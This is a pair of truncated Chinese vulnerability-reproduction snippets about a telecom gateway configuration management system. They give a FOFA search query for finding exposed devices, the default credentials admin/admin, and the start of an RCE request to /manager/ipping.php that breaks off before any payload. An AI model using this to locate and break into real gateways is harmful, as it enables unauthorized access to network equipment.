电信网关配置管理系统漏洞 fofa语句: body="img/dl.gif" && title="系统登录" 1.弱口令漏洞 弱口令: admin|admin 2.RCE漏洞 RCE POST /manager/ipping.php HTTP/1.1Host:Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Geck...
电信网关配置管理系统 FOFA body="src="img/dl.gif"" && title="系统登录" 漏洞复现 登录页面如下 设备存在默认弱口令 admin/admin 登录的请求包为 POST /manager/login.php HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Length: 53 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: ...